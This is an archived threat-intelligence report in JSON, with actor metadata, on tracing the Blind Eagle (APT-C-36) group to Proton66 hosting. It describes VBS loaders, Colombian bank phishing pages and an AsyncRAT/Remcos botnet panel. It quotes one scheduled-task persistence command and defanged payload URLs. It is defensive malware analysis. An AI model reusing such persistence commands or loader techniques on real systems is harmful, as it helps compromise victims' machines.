{ "id": "206a5670-a1b7-4dd1-95af-cd8549a7a8aa", "created_at": "2026-04-29T02:20:35.386141Z", "updated_at": "2026-04-29T08:23:11.982683Z", "deleted_at": null, "sha1_hash": "44d0012ed7e23b8adb4e2ffa363b8277b1c05414", "title": "Tracing Blind Eagle to Proton66", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3015774, "plain_text": "Tracing Blind Eagle to Proton66\r\nBy Serhii Melnyk\r\nPublished: 2025-06-27 · Archived: 2026-04-29 02:11:13 UTC\r\nJune 27, 2025 4 Minute Read by Serhii Melnyk\r\nTrustwave SpiderLabs has assessed with high confidence that the threat group Blind Eagle, aka APT-C-36, is\r\nassociated with the Russian bulletproof hosting service provider Proton66. Blind Eagle is a threat actor actively\r\ntargeting organizations across Latin America, with a notable focus on Colombian financial institutions.\r\nTrustwave SpiderLabs, which has been tracking Proton66 for the last several months, was able to make this\r\nconnection by pivoting from Proton66-linked assets, which led to the identification of another active threat cluster\r\nrelying on the same ASN infrastructure.\r\nPivoting identified what is assessed to be one of its most recent and operationally active infrastructure clusters,\r\ncharacterized by strong interconnections across multiple domains and IP address clusters. This infrastructure\r\nexclusively leverages Visual Basic Script (VBS) files as its initial attack vector, relies heavily on free Dynamic\r\nDNS (DDNS) services, and deploys readily available Remote Access Trojans (RATs) as a second-stage malware.\r\nAs for the starting pivot point of this analysis from Proton66 OOO infrastructure, one notable case involved a set\r\nof domains following a certain naming pattern that began appearing in summer 2024. These domains all resolved\r\nto the IP address 45.135.232[.]38, which is part of a netblock associated with Proton66 OOO.\r\nhttps://www.levelblue.com/blogs/spiderlabs-blog/tracing-blind-eagle-to-proton66/\r\nPage 1 of 13\n\nFigure 1. DuckDNS.org domain registrations with a similar naming pattern, starting on August 12, 2024.\r\nThe domains in question were used to host a variety of malicious content, including phishing pages and VBS\r\nscripts that serve as the initial stage of malware deployment. These scripts act as loaders for second-stage tools,\r\nwhich, in this campaign, are limited to publicly available and often open-source RATs. Notably, an analysis of\r\nsome of the VBS codes also revealed overlaps with previously analyzed samples generated by Vbs-Crypter, linked\r\nto “Crypters and Tools” – a subscription-based service. This crypter is commonly used to obfuscate and pack VBS\r\npayloads, hindering static detection. The presence of such artifacts suggests that the threat actors behind this\r\ncampaign leveraged the service to generate their loaders.\r\nhttps://www.levelblue.com/blogs/spiderlabs-blog/tracing-blind-eagle-to-proton66/\r\nPage 2 of 13\n\nFigure 2. “Crypters And Tools” Telegram advertisement.\r\nDespite the potentially high-value targeting, there is little evidence that the threat actors made a concerted effort to\r\nobscure their infrastructure. On the contrary, numerous open directories (opendirs) were discovered throughout the\r\ninfrastructure, many of which hosted identical malicious files. In some of the more egregious cases, these\r\ndirectories contain complete phishing pages impersonating legitimate Colombian banks and financial institutions,\r\nalong with first-stage malware designed to initiate the infection. In one of the identified clusters, the threat actors\r\ncreated phishing pages designed to impersonate several well-known Colombian financial institutions, including\r\nBancolombia, BBVA, Banco Caja Social, and Davivienda.\r\nFigure 3. Bancolombia phishing page.\r\nhttps://www.levelblue.com/blogs/spiderlabs-blog/tracing-blind-eagle-to-proton66/\r\nPage 3 of 13\n\nFigure 4. Davivienda phishing page.\r\nThese phishing sites were designed to harvest user credentials and other sensitive information. The sites include\r\nHTML, CSS, and image files that replicate the appearance of legitimate banking login portals. In addition to the\r\nphishing pages, this specific set of infrastructure also hosted various VBS scripts that serve as the first stage of\r\nmalware deployment. Notably identified samples include download-and-run scripts that retrieve encrypted\r\nexecutable files from a remote server.\r\nFigure 5. Code example that checks whether the VBS file is running with admin privileges and, if not, uses\r\nWindows scripting methods to re-execute itself with elevated permissions. Upon successful escalation, it adds an\r\nexclusion for the entire C:\\ drive in Defender.\r\nhttps://www.levelblue.com/blogs/spiderlabs-blog/tracing-blind-eagle-to-proton66/\r\nPage 4 of 13\n\nFigure 6. Code example that deletes Windows Registry keys related to COM/ActiveX classes (Software\\Classes),\r\nComponent identifiers (CLSID) and WOW6432Node paths, as a cleanup step.\r\nAnd while some have a distinct, narrow purpose, the majority work solely as a first-stage loader for the same\r\nselection of commodity second-stage RATs and following the same pattern. After cleaning between 6,000 to\r\n20,000 lines, which mostly consist of comments, it’s observed that the first part in most of them initially creates\r\nthe scheduled task:\r\nhttps://www.levelblue.com/blogs/spiderlabs-blog/tracing-blind-eagle-to-proton66/\r\nPage 5 of 13\n\nFigure 7. \"schtasks /create /tn coJb /tr \"%TEMP%\\GLPd.vbs\" /sc minute /mo 1 \" example within one of the VBS\r\nsamples.\r\nThe second part decodes a Base64 string, which is then executed via PowerShell:\r\nhttps://www.levelblue.com/blogs/spiderlabs-blog/tracing-blind-eagle-to-proton66/\r\nPage 6 of 13\n\nFigure 8. Deobfuscated and decoded example\r\nIt then downloads the next payload using resources such as paste.ee , textbin.net, store3.gofile.io or directly\r\nreferring to IPv4 addresses:\r\nFigure 9. Examples with hxxps://paste[.]ee/r/jNJfecjT/0, hosted on hxxps://textbin[.]net/raw/xsi2eulwpw\r\nThe next payload is typically a file with an MZ header that will be renamed, in this case as dll02.txt, which is a\r\nDLL file that will load the final payload, which will be downloaded from another URL. The file is another Base64\r\nstring that will also decode to an MZ file, and the pattern concludes with the final payloads, which are either\r\nRemcos or AsyncRATs for this specific cluster, that are then used to establish command and control (C2) with the\r\nmanagement panel.\r\nhttps://www.levelblue.com/blogs/spiderlabs-blog/tracing-blind-eagle-to-proton66/\r\nPage 7 of 13\n\nFigure 10. Deobfuscated example.\r\nIn one observed case, such a web-based botnet panel featured a Brazilian Portuguese-language written user\r\ninterface and included a fully functional dashboard used to manage compromised hosts. This panel contained\r\nvictim logs, deployment paths for initial-stage droppers, and links to the same publicly accessible, open-source\r\nRAT payloads, specifically AsyncRAT variants.\r\nFigure 11. Botnet panel – Dashboard showing a list of infected machines (264 at the time of analysis, primarily\r\nbased in Argentina) and four buttons/options in the last column to manage them.\r\nThe botnet management interface allows operators to control infected machines, retrieve exfiltrated data, and\r\ninteract with infected endpoints through a broad set of capabilities typically found in commodity RAT\r\nmanagement suites.\r\nhttps://www.levelblue.com/blogs/spiderlabs-blog/tracing-blind-eagle-to-proton66/\r\nPage 8 of 13\n\nFigures 12 and 13. Contextual control options are displayed after selecting an individual victim within the botnet\r\npanel interface, showing the range of post-compromise actions available to the operator, including command\r\nexecution, file exfiltration, and payload deployment from a specified URL.\r\nThis level of access provided through the exposed botnet panel illustrates not only the operational simplicity of the\r\ncampaign but also reinforces the minimal emphasis placed by the threat actors on infrastructure\r\ncompartmentalization or concealment — exhibiting a clear sign of prioritizing rapid deployment and accessibility\r\nover stealth or long-term sustainability. Each component of the infrastructure — including malware hosting\r\nservers, C2 panels, and phishing-related files — is hosted on domains that exhibit consistent naming patterns, SSL\r\ncertificate reuse, and shared artifacts. Whether due to oversight or intent, the infrastructure shows minimal effort\r\ntoward segmentation or concealment. Many components, including the above examples of C2 panel and VBS\r\nfiles, were publicly accessible via open directories and often lacked basic segmentation.\r\nThis ongoing activity underscores how unsophisticated threat infrastructures can still result in successful\r\ncompromises, particularly when paired with phishing lures tailored to specific regional targets. While Colombian\r\nfinancial institutions remain a primary focus, the broader pattern suggests an increasing capability to scale\r\noperations across the Latin American (LATAM) region.\r\nhttps://www.levelblue.com/blogs/spiderlabs-blog/tracing-blind-eagle-to-proton66/\r\nPage 9 of 13\n\nOrganizations in LATAM, especially within the financial sector, should maintain heightened vigilance around\r\nbanking-themed emails, enforce robust email filtering, and regularly train staff to identify localized phishing\r\ntechniques. Organizations can also benefit from using advanced email filtering solutions like Trustwave\r\nMailMarshal to detect and block malicious emails that may contain harmful attachments or links. Proactive\r\nmonitoring for regionally targeted infrastructure and threat indicators can significantly reduce the risk of\r\ncompromise.\r\nIoC\r\nhttps://www.levelblue.com/blogs/spiderlabs-blog/tracing-blind-eagle-to-proton66/\r\nPage 10 of 13\n\nhttps://www.levelblue.com/blogs/spiderlabs-blog/tracing-blind-eagle-to-proton66/\r\nPage 11 of 13\n\nhttps://www.levelblue.com/blogs/spiderlabs-blog/tracing-blind-eagle-to-proton66/\r\nPage 12 of 13\n\nSource: https://www.levelblue.com/blogs/spiderlabs-blog/tracing-blind-eagle-to-proton66/\r\nhttps://www.levelblue.com/blogs/spiderlabs-blog/tracing-blind-eagle-to-proton66/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "https://www.levelblue.com/blogs/spiderlabs-blog/tracing-blind-eagle-to-proton66/" ], "report_names": [ "tracing-blind-eagle-to-proton66" ], "threat_actors": [ { "id": "98b22fd7-bf1b-41a6-b51c-0e33a0ffd813", "created_at": "2022-10-25T15:50:23.688973Z", "updated_at": "2026-04-29T06:58:57.691272Z", "deleted_at": null, "main_name": "APT-C-36", "aliases": [ "APT-C-36", "Blind Eagle", "TAG-144", "AguilaCiega", "APT-Q-98" ], "source_name": "MITRE:APT-C-36", "tools": [ "njRAT", "Imminent Monitor", "DCRAT", "PureCrypter", "Caminho", "Remcos", "AsyncRAT", "QuasarRAT", "HeartCrypt" ], "source_id": "MITRE", "reports": null }, { "id": "be597b07-0cde-47bc-80c3-790a8df34af4", "created_at": "2022-10-25T16:07:23.407484Z", "updated_at": "2026-04-29T06:58:57.790051Z", "deleted_at": null, "main_name": "Blind Eagle", "aliases": [ "APT-C-36", "APT-Q-98", "AguilaCiega", "G0099" ], "source_name": "ETDA:Blind Eagle", "tools": [ "AsyncRAT", "BitRAT", "Bladabindi", "BlotchyQuasar", "Imminent Monitor", "Imminent Monitor RAT", "Jorik", "LimeRAT", "Remcos", "RemcosRAT", "Remvio", "Socmer", "Warzone", "Warzone RAT", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "bd43391b-b835-4cb3-839a-d830aa1a3410", "created_at": "2023-01-06T13:46:38.925525Z", "updated_at": "2026-04-29T06:58:56.373654Z", "deleted_at": null, "main_name": "APT-C-36", "aliases": [ "Blind Eagle" ], "source_name": "MISPGALAXY:APT-C-36", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1777429235, "ts_updated_at": 1777450991, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/44d0012ed7e23b8adb4e2ffa363b8277b1c05414.pdf", "text": "https://archive.orkl.eu/44d0012ed7e23b8adb4e2ffa363b8277b1c05414.txt", "img": "https://archive.orkl.eu/44d0012ed7e23b8adb4e2ffa363b8277b1c05414.jpg" } }